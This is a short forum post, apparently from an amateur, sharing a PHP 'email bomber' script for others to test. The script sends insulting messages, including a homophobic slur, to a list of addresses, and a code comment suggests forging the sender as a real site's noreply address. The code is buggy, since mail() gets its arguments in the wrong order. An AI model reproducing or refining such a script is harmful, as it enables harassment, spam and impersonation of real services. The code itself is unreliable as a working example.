[Php]Email Bomber!
<?php
$email_list = file("Your Current Email List");
$total_emails = count($email_list);
for ($counter=0; $counter<$total_emails; $counter++) {
$email_list[$counter] = trim($email_list[$counter]);
}
$to = implode(",",$email_list);
$subject = "You fucking suck ;D"; //<-- Fill this in with the subject. E.g: "Domo's Email Bomber! Beta Test"
$message = "Your Fucking Gay ;D"; //<-- Put you're e-mail content here.
$from = ""; //Put who's it from. E.g "noreply@Gaiaonline.com"
if ( mail($to,$from, $subject,$message) ) {
echo "The email has been sent!";
} else {
echo "The email has failed!";
}
?>Hey i wanted to share my email bomber to see if it works ;/ or not if it doesn't please post that it doesnt.
please contact if this also has wrong coding ;/
;D ~BETA TEST!~
